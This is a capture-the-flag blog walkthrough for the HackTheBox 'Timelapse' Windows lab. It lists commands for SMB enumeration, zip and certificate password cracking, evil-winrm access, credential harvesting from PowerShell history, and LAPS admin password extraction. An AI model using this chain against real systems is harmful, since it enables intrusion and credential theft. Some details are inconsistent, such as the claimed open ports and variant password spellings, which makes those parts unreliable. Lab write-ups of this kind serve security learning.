Timelapse HTB (Hackthebox) Walkthrough

Introduction ????????

In this post, You will learn how to CTF the Timelapse from hackthebox and below is the video format of the post, Check it out ????????

Hacking phases in Timelapse

  1. Nmap scan
  2. Enumeration (Enumerating SMB)
  3. Gaining access
  4. Privilege escalation
  5. Lateral movement
  6. Get the root flag

Hacking Timelapse from HTB

Follow the steps carefully and if there is any kind of error or the box is not working you are free to text me on discord, click below to join my discord community ????????

Discord: https://discord.gg/rmW5eWsjhR


Target IP

The standard target IP is and the target is using windows OS, So we know that we are not going to enumerate a linux system, Let’s hack a windows machine.


Nmap scan

e are going to do a full port scan and service and version scan and the scan took almost 20 min to finish.

sudo nmap -p- -sV -T4

We can see that the port 22 and 80 are open and both the ports are running a standard service.

Maybe there is a way we could connect to the target using port 22 that is using ssh service.

Enumeration (Enumerating smb) ????

To enumerate the smb we are using the smbmap tool.

smbmap -H -u " " -p " "

Let’s take a look at the workgroup present.

smbclient -L // -N 

Let’s enumerate the share workgroup.

smbclient //
ls Dev
cd Dev
get winrm_backup.zip
cd ..
cd HelpDesk\

By enumerating through the /share directory we have found winrm_backup.zip which is password protected.

unzip winrm_backup.zip

Password cracking ????

Let’s use fcrackzip to crack the password.

fcrackzip -D -u winrm_backup.zip -p pass.txt

The password for the zip file is supreme legacy.

unzip winrm_backup.zip

The password will be supremelegacy.

We could see a pfx after unzipping winrm_backup.zip.

file legacy_dev_auth.pfx

Converting the pfx file to .hash format so, that we can use John and crack the password.

pfx2john legacyy_dev_auth.pfx >pfx_timelapse.hash

Once we converted the file to .hash format let’s use John to crack the password.

John -w=pass.txt pfx_timelapse.hash –rule /usr/share/John/rules/rockyou-30000.rule

The password we got is thuglegacy.

Exporting certificate

Using the pfx file we could export the certificate of key file and private key.


openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

Now enter the password as thug legacy.

cat priv-key.pem 
cat certificate.pem

Copy from begin to end in a separate file like the below pic.


Now, let’s use legacy.cert and legacy.key files to perform authentication via SSL using evil-winrm.

Gaining access ????????

We have gained the access using evil winrm.

evil-winrm -S -k legacy.key -c legacy.cert -I

Privilege escalation

Let’s check for number of users in this target machine.

cd C:\Users\

We didn’t get much information from the above users. Let’s check the privilege with net user legacy.

net user legacyy

Querying the history file path using env variable.

echo $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\
cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\

Now, we have got credentials for svc_deploy.

cat  ConsoleHost_history.txt

Reusing this credentials.

cd C:\Users
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck

$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force

$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)

Passing command via-ps remoting.

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami} timelapse\svc_deploy

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}

We are now able to query this session as svc_deploy, Checking the privileges of this user,

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv}

Let’s check the group members of net user.

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy}

This user svc_deploy is now a member of LAPS_Reader now we can extract the local administrator password.

Lateral movement

Let’s check LAPS password using AD-MODULE,


invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}

We can see that the local Administrator password of DC01$ is  7D[aiwGj;6#/ 6V05167hl+kb

Lets use evil-winrm to PS-Remote with this credential

evil-winrm -u 'Administrator' -p '7D[aiwGj;6#} 6V05167hl+kb' -i  -S

The credentials will change each time you play.

Root Flag capture

dir C:\Users
cd C:\Users\TRX\Desktop
type root.txt


According to me this is a very simple challenge and I rate it some where around 2 out of 10 and I hope you like the post, See you in next post. ❤️


Also Read: Broken vulnhub challange

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site


Scroll to Top